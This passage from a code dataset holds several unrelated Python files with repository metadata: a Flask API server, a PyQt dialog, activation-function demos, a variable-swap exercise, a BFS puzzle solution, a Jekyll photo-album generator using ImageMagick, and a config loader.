con.cursor(cursorclass=mdb.cursors.DictCursor) \n cur.execute(\"SELECT * FROM charsets WHERE hidden=0;\")\n\n resp = {}\n\n import time, datetime\n f = open(\"annoucement.txt\",\"r\")\n raw_text = f.readline()\n if raw_text:\n data = raw_text.split('::')\n if len(data) == 2:\n d = datetime.datetime.strptime(data[0],\"%m/%d/%Y\").date()\n timestamp = time.mktime(d.timetuple())\n resp = { 'annoucement' : data[1],\n 'timestamp' : timestamp}\n\n return jsonify(resp)\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n#########################################\n\n@app.route(\"/charsets\", methods=['POST'])\ndef charsets():\n try:\n key = request.form['key'] \n if (key != mc.secret_key): abort(403)\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor) \n cur.execute(\"SELECT * FROM charsets WHERE hidden=0;\")\n \n # [ {'charsetID' : int , \n # 'name' : string \n # 'character' : [] } ]\n resp = []\n rows = cur.fetchall()\n for row in rows:\n resp.append(\n { 'charsetID' : row['charset_id'],\n 'name' : row['charset_name'],\n 'characters' : json.loads(row['characters']) \n }\n )\n return Response(json.dumps(resp, \n ensure_ascii=False).encode('utf-8'))\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR':1})\n\n#########################################\n\n@app.route(\"/protosets\", methods=['POST'])\ndef protosets():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n\n user_id = request.form['user_id']\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor) \n\n # initialize with global protosets\n cur.execute(\"\"\"\n SELECT protoset_id, protoset_json FROM protosets \n WHERE user_id=%s;\n \"\"\", (-1,))\n\n resp = {}\n rows = cur.fetchall()\n for row in rows:\n protoset = json.loads(row['protoset_json'])\n label = protoset['label']\n protoset['protosetID'] = row['protoset_id']\n resp[label] = protoset\n \n # supplement with user-specific protosets\n cur.execute(\"\"\"\n SELECT protoset_id, protoset_json FROM protosets \n WHERE user_id=%s;\n \"\"\", (user_id,))\n\n rows = cur.fetchall()\n for row in rows:\n protoset = json.loads(row['protoset_json'])\n label = protoset['label']\n protoset['protosetID'] = row['protoset_id']\n resp[label] = protoset\n \n return Response(json.dumps(resp, \n ensure_ascii=False).encode('utf-8'))\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'ERROR' : 1})\n \n#########################################\n\n@app.route(\"/newuser\", methods=['POST'])\ndef newuser():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403) \n\n username = request.form['username']\n fullname = request.form['fullname']\n email = request.form['email']\n \n con = g.db_con \n cur = con.cursor()\n cur.execute(\"\"\"\n INSERT INTO users\n (username, fullname, email, displayname, aliases) \n VALUES (%s,%s,%s,%s,%s);\n \"\"\", (username, fullname, email, username[3:], ''))\n\n resp = {}\n resp['user_id'] = con.insert_id()\n\n cur = con.cursor()\n cur.execute(\"\"\"\n UPDATE users \n SET linked_id=user_id\n WHERE user_id=%s;\n \"\"\", (resp['user_id'],))\n\n return jsonify(resp)\n\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'user_id':0})\n\n#########################################\n\n@app.route(\"/login\", methods=['POST'])\ndef login():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n\n username = request.form['username']\n\n con = g.db_con\n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"SELECT user_id FROM users WHERE username=%s;\", \n (username,))\n\n resp = {}\n row = cur.fetchone()\n if row is None:\n resp['login_result'] = 'User not found'\n app.logger.warning(\"User %s not found.\"%(username))\n else:\n resp['login_result'] = 'OK'\n resp['user_id'] = row['user_id']\n app.logger.info(\"User %s logged in successfully.\"%(\n username))\n\n return jsonify(resp)\n\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'login_result':'ERROR'})\n\n#########################################\n\ndef level_by_exp(exp):\n exp_obj = {}\n exp_obj['experience'] = exp\n level = 0\n next_level_exp = 0\n for needed in _exp_needed:\n if exp >= needed:\n level += 1\n exp -= needed\n else:\n next_level_exp = needed - exp\n break\n exp_obj['level'] = level\n exp_obj['next_level_exp'] = next_level_exp\n return exp_obj\n\n@app.route(\"/upload\", methods=['POST'])\ndef upload():\n try:\n key = request.form['key']\n if (key != mc.secret_key): abort(403)\n \n user_id = request.form['user_id']\n mode_id = request.form['mode_id']\n bps = request.form['bps']\n total_time = request.form['total_time']\n total_score = request.form['total_score']\n active_chars = request.form['active_characters'].encode('utf-8')\n active_pids = request.form['active_protoset_ids'].encode('utf-8')\n session_json = request.form['session_json'].encode('utf-8')\n\n con = g.db_con \n cur = con.cursor(cursorclass=mdb.cursors.DictCursor)\n cur.execute(\"\"\"\n INSERT INTO sessions\n (user_id, mode_id, bps, total_time,\n total_score, session_json, \n active_protoset_ids, active_characters)\n VALUES\n (%s,%s,%s,%s,%s,%s,%s,%s);\n \"\"\", (user_id, mode_id, bps, total_time, \n total_score, session_json,\n active_pids, active_chars))\n\n session = json.loads(session_json)\n session['sessionID'] = con.insert_id()\n \n # update exp and level\n if int(mode_id) == RACE_MODE_ID:\n cur = con.cursor() \n cur.execute(\"\"\"\n SELECT experience FROM users WHERE user_id=%s\n \"\"\",(user_id,))\n row = cur.fetchone()\n exp = level_by_exp(row[0] + float(bps))\n\n cur = con.cursor()\n cur.execute(\"\"\"\n UPDATE users \n SET experience=%s, level=%s, next_level_exp=%s\n WHERE user_id=%s\n \"\"\", (exp['experience'],\n exp['level'],\n exp['next_level_exp'],\n user_id))\n\n ##################################\n # Queue the process_session task #\n ################################## \n q = Queue('normal', connection=Redis())\n q.enqueue(process_session, session)\n \n app.logger.info(\"User %s uploaded a session\"%(user_id))\n\n return jsonify({'Error':0})\n except:\n app.logger.exception(\"An exception has been raised\")\n return jsonify({'Error':1})\n\n#########################################\n\nif __name__ == \"__main__\":\n # parse arguments\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--port', default=8000, type=int,\n help='port to listen (default: 8000)')\n args = parser.parse_args()\n \n # set up logger\n import logging.handlers as lh\n app.logger_name = 'uright'\n app.logger.setLevel(logging.INFO)\n formatter = logging.Formatter('%(name)s: %(message)s')\n syslog_handler = lh.SysLogHandler(address='/dev/log')\n syslog_handler.setFormatter(formatter)\n app.logger.addHandler(syslog_handler)\n\n app.run(host='127.0.0.1', port=args.port)\n","repo_name":"sunsern/uright-server","sub_path":"uright-server.py","file_name":"uright-server.py","file_ext":"py","file_size_in_byte":13146,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73565266613","text":"from PyQt5.QtWidgets import QDialog\nfrom ui.ui_integer_spin_dialog import Ui_IntegerSpinDialog\n\nclass IntegerSpinDialog(QDialog, Ui_IntegerSpinDialog):\n def __init__(self):\n QDialog.__init__(self)\n Ui_IntegerSpinDialog.__init__(self)\n self.setupUi(self)\n \n def exec_(self):\n previous = self.spinBox.value()\n result = super().exec_()\n \n if result == self.Rejected:\n self.spinBox.setValue(previous)\n \n return result\n ","repo_name":"enjoysmath/abstract-spacecraft","sub_path":"dialog/integer_spin_dialog.py","file_name":"integer_spin_dialog.py","file_ext":"py","file_size_in_byte":520,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70104116534","text":"# -*- coding: utf-8 -*-\n'''\nauthor: ysoftman\npython version : 3.x\ndesc : 활성화 함수 테스트\n'''\n# pip3 install numpy matplotlib\nimport numpy as np\nimport matplotlib.pylab as plt\n\n\n# step(스텝)\n# 계단 모양으로 입력이 0 이하면 0(비활성화) 0이상이면 1(활성화)\ndef step(x):\n # dtype 옵션으로 bool 결과를 int 변환해야 한다.\n return np.array(x > 0, dtype=int)\n\n\n# sigmoid(시그모이드)\n# s 모양으로 출력이 점진적으로 커진다.\n# y = 1 / (1 + (자연상수e ** -x))\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\n# ReLU(렐루)\n# 입력이 0이하면 0, 0 초과하면 입력값 그대로 출력(활성화)\ndef relu(x):\n return np.maximum(0, x)\n\n\n# softmax(소프트맥스)\n# 훈련시 출력 레이어에서 사용한다.\n# 각 노드 출력을 전체 1.0 에 대한 비율(확률)로 계산한다.\ndef softmax(x):\n if x.ndim == 2:\n x = x.T\n x = x - np.max(x, axis=0)\n y = np.exp(x) / np.sum(np.exp(x), axis=0)\n return y.T\n x = x - np.max(x) # 오버플로 방지하기 가장 높은 값과의 차이만을 취한다.\n return np.exp(x) / np.sum(np.exp(x))\n\n\ndef graph(x, y, title):\n # set range y\n plt.ylim(-0.1, 1.1)\n # change windows title\n fig = plt.gcf()\n fig.canvas.set_window_title(title)\n # set x, y value\n plt.plot(x, y)\n # show graph\n plt.show()\n\n# 입력 x 값들에 대해서 활성화(출력 0이상)화 판단\nif __name__ == \"__main__\":\n x = np.arange(-5, 5, 0.1)\n y = step(x)\n print (x)\n print (y)\n graph(x, y, \"step function\")\n\n y = sigmoid(x)\n print (y)\n graph(x, y, \"sigmoid function\")\n\n y = relu(x)\n print (y)\n graph(x, y, \"relu function\")\n\n\n y = softmax(x)\n print (y)\n graph(x, y, \"softmax function\")\n","repo_name":"ysoftman/test_code","sub_path":"MachineLearning/activation_function.py","file_name":"activation_function.py","file_ext":"py","file_size_in_byte":1795,"program_lang":"python","lang":"ko","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"40928207738","text":"# Задача-2: Исходные значения двух переменных запросить у пользователя.\n# Поменять значения переменных местами. Вывести новые значения на экран.\n# Решите задачу, используя только две переменные.\n# Подсказки:\n# * постарайтесь сделать решение через действия над числами;\n\n\nmsg = 'Введите значения переменных'\nerr_msg = 'Что-то пошло не так. Попробуем еще раз.'\nok_msg = 'Получилось!'\nis_sys_err = 0\nis_usr_err = 0\nx = 0\n\nis_a_ok = 0\nis_b_ok = 0\nprint(msg)\nwhile not(is_a_ok == 1 and is_b_ok == 1):\n try:\n if is_a_ok == 0:\n a = float(input('a: '))\n is_a_ok = 1\n if is_b_ok == 0:\n b = float(input('b: '))\n is_b_ok = 1\n except:\n print(err_msg)\nprint(ok_msg, 'a = ', a,', b = ', b)\nprint('Поменыем значения переменных местами ', )\na = a + b\nb = a - b\na = a - b\nprint('a = ', a, ', b = ', b)\nprint('---------------------------------------------------')\n","repo_name":"MariaMF77/python","sub_path":"ex2.py","file_name":"ex2.py","file_ext":"py","file_size_in_byte":1231,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16968512237","text":"from collections import deque\nimport sys\nsys.setrecursionlimit(10**6)\n\n# 지도의 'X'는 바다, 숫자는 무인도\n# 상 하 좌 우 해당 무인도에서 최대 며칠 동안 머물 수 있는가\n# 최대 몇일? 배열에 오름차순으로 담아 return\n# 지낼 수 있는 것이 없다면 -1을 배열에 담아 return\n# dfs, bfs로 풀 수 있을 듯\n\ndef solution(maps):\n \n def bfs(x, y, days_cnt):\n \n queue = deque([(x, y)])\n while queue:\n r, c = queue.popleft()\n for idx in range(4):\n nx = r + dx[idx]\n ny = c + dy[idx]\n if -1 < nx < N and -1 < ny < M:\n if matrix[nx][ny] != 'X' and not visited[nx][ny]:\n days_cnt += int(matrix[nx][ny])\n visited[nx][ny] = True\n queue.append((nx, ny))\n \n return days_cnt\n \n answer = []\n\n N = len(maps)\n M = len(maps[0])\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n matrix = [list(elements) for elements in maps]\n visited = [[False] * M for _ in range(N)]\n\n for i in range(N):\n for j in range(M):\n days_cnt = 0\n if not visited[i][j] and matrix[i][j] != 'X':\n days_cnt += int(matrix[i][j])\n visited[i][j] = True\n answer.append(bfs(i, j, days_cnt))\n \n \n if len(set(answer)) == 0:\n return [-1]\n \n else:\n return sorted(answer)\n ","repo_name":"wdahlia/Python-Algorithm","sub_path":"프로그래머스/PG_무인도여행.py","file_name":"PG_무인도여행.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"ko","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"17540524683","text":"'''\nCreated on 5 Jul 2020\n\nModified 29 Sep 2022\n\n@author: thomasgumbricht\n\nNotes\n-----\nThe module jekyllalbum.py:\n\n requires that you have ImageMagick setup for your machine, that you have the SoSSImple (v 2) Jekyll theme\n a json file for parameters linking to a txt file listing the photos to import. \n \n The script takes 2 string parameters as input:\n \n - docpath: the full path to a folder that must contain the txt file as given by the \"projFN\" parameter\n - projFN: the name of an existing txt files that sequentially lists json parameter files to run\n \n \n The individual parameter files (listed in \"projFN\") must have approximately 40 parameters \n in a precise nested json structure with dictionaries and lists.\n You can create a template json parameter file by running \"def CreateParamJson\" (just uncomment under \"def SetupProcesses\",\n this creates a template json parameter file called \"jekyll_album_4_Jekyll-theme_SoSimple.json\" in the \n path given as the parameter \"docpath\".\n \n The script first run the stand alone \"def SetupProcesses\" that reads the txt file \"projFN\" and \n then sequentialy run the json parameter files listed. \n \n Each allbum creation (i.e. each json parameter file) is run as a sequence of commands:\n \n - JekyllYaml: creates the markdown yaml header\n - FigClass: processes the listed images using ImageMagick\n - MagickConvertFull: convert images using ImageMagick\n - MagickConvertPage: reduced resolution images from MagickConvertFull if requested\n - WritePost: Write the makrdown ffor the Jekyll theme soSimple (v2).\n \n'''\n\n# Standard library imports\n\nimport sys\n\nimport os\n\nimport subprocess\n\n# Third party imports\n\nimport json\n\nfrom PIL import Image\n\nfrom PIL.ExifTags import TAGS\n\ndef JekyllAlbumJson():\n \"\"\" Create a template dictionary for parametising this script\n \n \n :returns: template parameters \n :rtype: dict\n \n \"\"\"\n \n paramD = {\n \"overwrite\": True,\n \"media\": {\n \"srcfp\": \"path/to/image/library\",\n \"listfn\": \"album.txt\",\n \"labelsfn\": False,\n \"magickfn\": False\n },\n \"urlimages\": {\n \"xdim\": 1200,\n \"ydim\": 0,\n \"kind\": \"jpg\",\n \"quality\": 80,\n \"suffix\": \"m\"\n },\n \"inpageimages\": {\n \"xdim\": 300,\n \"ydim\": 0,\n \"kind\": \"jpg\",\n \"quality\": 70,\n \"suffix\": \"s\"\n },\n \"imagemagick\": {\n \"convert\": {\n \"-auto-gamma\": \"\"\n },\n \"dissolve\": 50,\n \"alpha\": 0,\n \"emboss\": False,\n \"watermark\": {\n \"-font\": \"Arial\",\n \"-pointsize\": \"250\",\n \"-gravity\": \"center\",\n \"-draw\": \"fill 'RGBA(32,32,64,0.25)' text 2,2 'KARTTUR' fill 'RGBA(255,255,255,0.25)' text -2,-2 'EMBOSS' fill grey text 0,0 'EMBOSS' \",\n \"-transparent\": \"grey\",\n \"-fuzz\": \"90%\"\n }\n },\n \"metadata\": {\n \"author\": \"Author Name\",\n \"datetime\": \"YYYYMMDD\",\n \"country\": \"country\",\n \"location\": \"Placename(s)\",\n \"movemode\": \"foot\",\n \"lon\": 18.080822,\n \"lat\": 59.374705,\n \"elev\": -999,\n \"yaw\": 0,\n \"pitch\": 0,\n \"roll\": 0\n },\n \"content\": {\n \"rolltitle\": \"title\",\n \"figcaption\": \"figure cpation. \",\n \"description\": \"short desicription.\",\n \"persons\": [\n \"N N\",\n \"M M\"\n ],\n \"keywords\": [\n \"key1\",\n \"key2\",\n \"key3\"\n ]\n },\n \"publication\": {\n \"quality\": 3,\n \"public\": 2,\n \"paltyp\": 2,\n \"figclass\": \"third\",\n \"layout\": \"post\",\n \"categories\": \"existing category in you SoSimple structure\",\n \"dstfp\": \"destination folder of your local SoSimple setup\"\n }\n }\n \n return (paramD)\n\ndef CreateParamJson(docpath):\n \"\"\" Create the default json parameters file structure, only to create template if lacking\n \n :param str docpath: directory path \n \"\"\"\n \n # Get the default params\n paramD = JekyllAlbumJson()\n \n # Set the json FPN\n jsonFPN = os.path.join(docpath, 'jekyll_album_4_Jekyll-theme_SoSimple.json')\n \n # Dump the paramD as a json object\n jsonF = open(jsonFPN, \"w\")\n \n json.dump(paramD, jsonF, indent = 2)\n \n jsonF.close()\n\ndef JekyllYaml(pD):\n \"\"\" Build the Jekyll album Yaml header\n \n :param pD: album parameters\n :type pD: dict\n \n :returns: yaml header \n :rtype: list\n \"\"\"\n\n yamlDate = '%(y)s-%(m)s-%(d)s' %{'y':pD['metadata']['datetime'][0:4], \n 'm':pD['metadata']['datetime'][4:6],\n 'd':pD['metadata']['datetime'][6:8]}\n \n yamlL = ['---', 'layout: %s' % pD['publication']['layout'], \n 'title: %s' % pD['content']['rolltitle'],\n 'categories: %s' % pD['publication']['categories'], \n 'excerpt: %s' % pD['content']['description'],\n 'tags:']\n \n for item in pD['content']['keywords']:\n \n yamlL.append(' - %s' % item)\n \n yamlL.extend( ['date: %s' % yamlDate, \n 'modified: %s' % yamlDate,\n 'comments: true', \n 'share: true', '---' ] )\n \n return yamlL\n\n\n \ndef GetImageMeta(srcImageFPN, dstJsonMetaFPN):\n \"\"\" Retrieve image exifdata (metadata) using PIL, write to json file and return\n \n :param srcImageFPN: path to image source file\n :type srcImageFPN: str\n \n :param dstJsonMetaFPN: path to destination metadata file\n :type dstJsonMetaFPN: str\n \n :returns: meatadata \n :rtype: dict\n \"\"\"\n \n metaD = {}\n img = Image.open(srcImageFPN)\n \n exifdata = img.getexif()\n \n for tag_id in exifdata:\n \n # get the tag name, instead of human unreadable tag id\n tag = TAGS.get(tag_id, tag_id)\n \n data = exifdata.get(tag_id)\n \n # decode bytes \n if isinstance(data, bytes):\n \n data = data.decode()\n \n metaD[tag] = data\n \n metaxD = {}\n \n for tag in metaD:\n \n if isinstance(metaD[tag], str): \n \n metaD[tag] = metaD[tag].rstrip('\\x00')\n \n if len(metaD[tag]) == 0:\n \n continue \n \n elif isinstance(metaD[tag], int): \n \n metaD[tag] = int(str(metaD[tag]))\n \n elif isinstance(metaD[tag], float): \n \n metaD[tag] = float(str(metaD[tag]))\n \n else:\n \n continue\n \n metaxD[tag] = metaD[tag]\n \n jsonF = open(dstJsonMetaFPN, \"w\")\n \n json.dump(metaxD, jsonF, indent = 2)\n \n jsonF.close()\n \n return metaxD\n \ndef MagickConvertPage(pD, dstFullFPN, dstPageFPN):\n \"\"\" ImageMagick reduction of size and quality of the destination image to a smaller, in-page image\n \n :param pD: process parameters\n :type pD: dict\n \n :param dstFullFPN: path to larger, existing (url-linked) destination image\n :type dstFullFPN: str\n \n :param dstPageFPN: path to smaller (in-page) destination image\n :type dstPageFPN: str\n \"\"\"\n \n #Here is the conversion\n if int(pD['inpageimages']['xdim']) and int(pD['inpageimages']['ydim']):\n \n resize = '%sx%s' %(pD['inpageimages']['xdim'], pD['inpageimages']['ydim'])\n \n elif int(pD['inpageimages']['xdim']):\n \n resize = '%sx' %(pD['inpageimages']['xdim'])\n \n elif int(pD['inpageimages']['ydim']):\n \n resize = 'x%s' %(pD['inpageimages']['ydim'])\n \n else:\n \n resize = False\n \n quality = str(pD['inpageimages']['quality'])\n \n cmdL = ['/usr/local/bin/convert', '-resize', resize, '-quality', quality, dstFullFPN, dstPageFPN]\n \n subprocess.run(cmdL)\n\ndef MagickConvertFull(pD, srcImageFPN, dstFullFPN, tempFPN):\n \"\"\" Process image source using ImageMAgick and save to destination path(s)\n \n :param pD: process parameters\n :type pD: dict\n \n :param srcImageFPN: path to the source image\n :type srcImageFPN: str\n \n :param dstFullFPN: path to larger (url-linked) destination image\n :type dstFullFPN: str\n \n :param tempFPN: path to temporary image file\n :type tempFPN: str\n \"\"\"\n #Here is the conversion\n if int(pD['urlimages']['xdim']) and int(pD['urlimages']['ydim']):\n \n resize = '%sx%s' %(pD['urlimages']['xdim'], pD['urlimages']['ydim'])\n \n elif int(pD['urlimages']['xdim']):\n \n resize = '%sx' %(pD['urlimages']['xdim'])\n \n elif int(pD['urlimages']['ydim']):\n \n resize = 'x%s' %(pD['urlimages']['ydim'])\n \n else:\n \n resize = False\n \n quality = str(pD['urlimages']['quality'])\n \n if pD['imagemagick']:\n \n convertCmd = []\n \n for k,v in pD['imagemagick']['convert'].items():\n convertCmd.append(k)\n if v:\n convertCmd.append( str(v) )\n \n convertCmd = ','.join(convertCmd)\n\n else:\n \n convertCmd = False\n \n if resize: \n \n if convertCmd:\n \n cmdL = ['/usr/local/bin/convert', '-resize', resize, convertCmd, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else:\n cmdL = ['/usr/local/bin/convert', '-resize', resize, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else: \n if convertCmd:\n \n cmdL = ['/usr/local/bin/convert', convertCmd, '-quality', quality, srcImageFPN, dstFullFPN]\n \n else:\n cmdL = ['/usr/local/bin/convert', '-quality', quality, srcImageFPN, dstFullFPN]\n\n subprocess.run(cmdL)\n \n if pD['imagemagick']['dissolve']:\n \n # Resize the original images\n cmdL = ['/usr/local/bin/convert', '-resize', resize, srcImageFPN, tempFPN]\n \n subprocess.run(cmdL)\n \n # composite the old and new image with the dissolve set\n cmdL = ['/usr/local/bin/composite', '-dissolve', str(pD['imagemagick']['dissolve']), tempFPN, dstFullFPN, dstFullFPN];\n \n subprocess.run(cmdL)\n \n if pD['imagemagick']['alpha']:\n \n pass\n # Not yet implemented\n \n if pD['imagemagick']['emboss']:\n \n img = Image.open(dstFullFPN)\n \n # get width and height\n w = img.width\n \n h = img.height\n\n cmdL = ['/usr/local/bin/convert', '-size', '%sx%s' %(w,h), 'xc:none',]\n \n for k,v in pD['imagemagick']['watermark'].items():\n\n cmdL.append( k )\n cmdL.append( v )\n \n cmdL.append( tempFPN )\n\n subprocess.run(cmdL)\n \n # Composite the embossed text and the fixed image \n cmdL = ['/usr/local/bin/composite', tempFPN, dstFullFPN, dstFullFPN];\n \n subprocess.run(cmdL)\n \ndef FigClass(pD, jsonFPN):\n \"\"\" Process figures (images, photos) using ImageMagick\n \n :param pD: parameters for creating jekyll album\n :type pD: dict\n \n :param jsonFPN: path to json parameter file\n :type jsonFPN: str\n \n :return bodyL: markdown body text\n :rtype bodyL: list\n \"\"\"\n \n srcFP, rollName = os.path.split(jsonFPN)\n \n rollName = os.path.splitext(rollName)[0]\n \n bodyL = []\n \n heading1 = '#### %s' %(pD['content']['description'])\n \n bodyL.append(heading1)\n \n who = '%s %s' %( '**Who:**', ', '.join(pD['content']['persons']) )\n \n bodyL.append(who)\n \n where = '**Where :** %s (%s)' %( pD['metadata']['location'], pD['metadata']['country'])\n \n bodyL.append(where)\n \n bodyL.append('Mouse over the images to highlight, click to see larger pop-up images.')\n \n if pD['publication']['figclass'] in ['1', 'single', 'none', 'None', 'NA', 'na']:\n bodyL.append('
')\n \n elif pD['publication']['figclass'] == 'half':\n bodyL.append(\"
\")\n \n elif pD['publication']['figclass'] == 'third':\n bodyL.append(\"
\")\n \n else:\n sys.exit('unknown figclass')\n \n # Create target folder\n tarFP = pD['publication']['dstfp']\n \n photoFP = os.path.join(tarFP,'photos')\n \n rollFP = os.path.join(photoFP,rollName)\n \n if not os.path.exists(rollFP):\n os.makedirs(rollFP)\n \n # Get the list of images\n listFPN = os.path.join(pD['media']['srcfp'], pD['media']['listfn'])\n \n with open(listFPN) as file:\n \n lines = file.readlines()\n \n lines = [line.rstrip() for line in lines]\n \n for file in lines:\n \n srcImageFPN = file\n \n FN = os.path.split(file)[1]\n \n dstFullFN = dstPageFN = '%s_%s_%s.%s' %(rollName, \n pD['urlimages']['suffix'], \n os.path.splitext(FN)[0], \n pD['urlimages']['kind'])\n \n dstjsonMetaFN = '%s_%s_%s.json' %(rollName, \n 'meta',\n os.path.splitext(FN)[0] )\n \n \n dstFullFPN = dstPageFPN = os.path.join(rollFP,dstFullFN)\n \n dstjsonMetaFPN = os.path.join(rollFP,dstjsonMetaFN)\n \n # Get the image meta data\n metaD = GetImageMeta(srcImageFPN,dstjsonMetaFPN)\n \n tempPFN = os.path.join(rollFP,'temp.png')\n \n if not os.path.isfile(dstFullFPN) or pD['overwrite']:\n \n MagickConvertFull(pD,srcImageFPN, dstFullFPN,tempPFN)\n \n if pD['inpageimages'] != pD['urlimages']:\n \n dstPageFN = '%s_%s_%s.%s' %(rollName, \n pD['inpageimages']['suffix'],\n os.path.splitext(FN)[0],\n pD['inpageimages']['kind'])\n \n dstPageFPN = os.path.join(rollFP,dstPageFN)\n \n if not os.path.isfile(dstPageFPN) or pD['overwrite']:\n \n MagickConvertPage(pD, dstFullFPN, dstPageFPN)\n\n bodyL.append('\"image\"' %{'fp':rollName, 'fullfn':dstFullFN, 'qlfn':dstPageFN}) \n\n #bodyL.append('%(meta)s' %{'fp':rollName, 'jsonfn':dstjsonMetaFN, 'meta':metaD['DateTime']}) \n\n bodyL.append(\"
%s
\" %(pD['content']['figcaption']))\n \n bodyL.append(\"
\") \n \n return bodyL\n\ndef WritePost(pD, jsonFPN, yamlL, bodyL):\n \"\"\" Write the album post as a markdown file\n \n :param pD: parameters for creating jekyll album\n :type pD: dict\n \n :param jsonFPN: path to json parameter file\n :type jsonFPN: str\n \n :param yamlL: markdown yaml text lines\n :type pD: list\n \n :param bodyL: markdown body text lines\n :type bodyL: list\n\n \"\"\"\n\n yamlDate = '%(y)s-%(m)s-%(d)s' %{'y':pD['metadata']['datetime'][0:4], \n 'm':pD['metadata']['datetime'][4:6],\n 'd':pD['metadata']['datetime'][6:8]}\n\n year = pD['metadata']['datetime'][0:4]\n \n rollName = os.path.split(jsonFPN)[1]\n \n rollName = os.path.splitext(rollName)[0]\n \n # Create target folder\n tarFP = pD['publication']['dstfp']\n \n yearFP = os.path.join(tarFP,'_posts',year)\n \n if not os.path.exists(yearFP):\n os.makedirs(yearFP)\n \n postFN = '%s-%s.md' %(yamlDate, rollName)\n \n postFPN = os.path.join(yearFP, postFN)\n \n if not os.path.isfile(postFPN) or pD['overwrite']:\n\n f = open(postFPN, 'w')\n \n for row in yamlL:\n \n f.write (row)\n \n f.write ('\\n')\n \n f.write ('\\n')\n \n for row in bodyL:\n \n f.write ('\\n')\n \n f.write (row)\n \n f.write ('\\n')\n \ndef PilotJekyllAlbum(jsonFPN):\n \"\"\" Create Jekyll photo album from json command file\n\n :param jsonFPN: path to xml file\n :type jsonFPN: str\n \"\"\"\n \n # Parse the json file\n with open(jsonFPN) as jsonF:\n \n pD = json.load(jsonF)\n \n # Create the Jekyll Yaml \n yamlL = JekyllYaml(pD)\n \n # Create the markdown \n bodyL = FigClass(pD, jsonFPN)\n \n WritePost(pD, jsonFPN, yamlL, bodyL)\n \ndef SetupProcesses(docpath, projFN): \n '''Setup and loop processes\n \n :paramn docpath: path to text file \n :type: lstr\n \n :param projFN: project filename\n :rtype: str\n \n '''\n \n ''' CreateParamJson creates the default json structure for running the python script, \n only use it to create a backbone then edit \n \n CreateParamJson(docpath)\n '''\n \n srcFP = os.path.join(os.path.dirname(__file__),docpath)\n\n projFPN = os.path.join(srcFP,projFN)\n\n # Get the full path to the project text file\n dirPath = os.path.split(projFPN)[0]\n\n if not os.path.exists(projFPN):\n\n exitstr = 'EXITING, project file missing: %s' %(projFPN)\n\n exit( exitstr )\n\n infostr = 'Processing %s' %(projFPN)\n\n print (infostr)\n\n # Open and read the text file linking to all json files defining the project\n with open(projFPN) as f:\n\n jsonL = f.readlines()\n\n # Clean the list of json objects from comments and whithespace etc\n jsonL = [os.path.join(dirPath,x.strip()) for x in jsonL if len(x) > 10 and x[0] != '#']\n\n #Loop over all json files and create Schemas and Tables\n for jsonObj in jsonL:\n \n print ('jsonObj:', jsonObj)\n \n PilotJekyllAlbum(jsonObj)\n \nif __name__ == '__main__':\n \"\"\"\n \"\"\"\n \n docpath = \"/Volumes/karttur/bilder/se\"\n \n projFN = (\"jekyllalbums_se.txt\")\n \n SetupProcesses(docpath, projFN)\n ","repo_name":"karttur/pyscripts","sub_path":"jekyllalbum/jekyllalbum.py","file_name":"jekyllalbum.py","file_ext":"py","file_size_in_byte":18599,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8043434044","text":"import math\ndef calc_area(points_list: list[tuple]) -> float:\n # Using area formula from: https://www.mathopenref.com/coordpolygonarea.html\n if len(points_list) < 3:\n return 0\n prev_point = points_list[-1]\n sum = 0\n for point in points_list:\n part = prev_point[0] * point[1] - prev_point[1] * point[0]\n sum += part\n prev_point = point\n sum /= 2\n area = abs(sum)\n return area\n\nif __name__ == '__main__':\n n = int(input(\"Input number of points: \"))\n polygon = []\n for i in range(n):\n x = float(input(f\"Point[{i + 1}].X = \"))\n y = float(input(f\"Point[{i + 1}].Y = \"))\n polygon.append((x, y))\n if i > 0:\n print(f\"Side[{i}] = {math.sqrt((x - previous[0])**2 + (y - previous[1])**2)}\")\n previous = (x, y)\n print(f\"Area of {polygon} is: {calc_area(polygon)}\")\n # polygons = [\n # [(0, 0), (0, 7), (4, 7), (4, 0)],\n # [(2, 2), (11, 2), (9, 7), (4, 10)]\n # ]\n # for poly in polygons:\n # print(calc_area(poly))\n","repo_name":"iproduct/intro-python","sub_path":"01-up-2022-lab/calculate_area.py","file_name":"calculate_area.py","file_ext":"py","file_size_in_byte":1044,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"4736539033","text":"# -*- coding: utf-8 -*-\r\n# producer: 王健吉(leimilia)\r\n\r\ndef get_config():\r\n with open('config.ini', 'r', encoding='utf-8-sig') as obj:\r\n info = obj.readlines()\r\n\r\n str_info = str(info[0])\r\n dict_info = eval(str_info)\r\n return dict_info\r\n\r\n\r\nclass Trans():\r\n def __init__(self):\r\n dict_info = get_config()\r\n self.user_name = dict_info['config']['username']\r\n self.user_pwd = dict_info['config']['passpwd']\r\n self.host = dict_info['config']['host']\r\n self.port = dict_info['config']['port']\r\n self.sid = dict_info['config']['sid']\r\n self.database_address = None\r\n\r\n 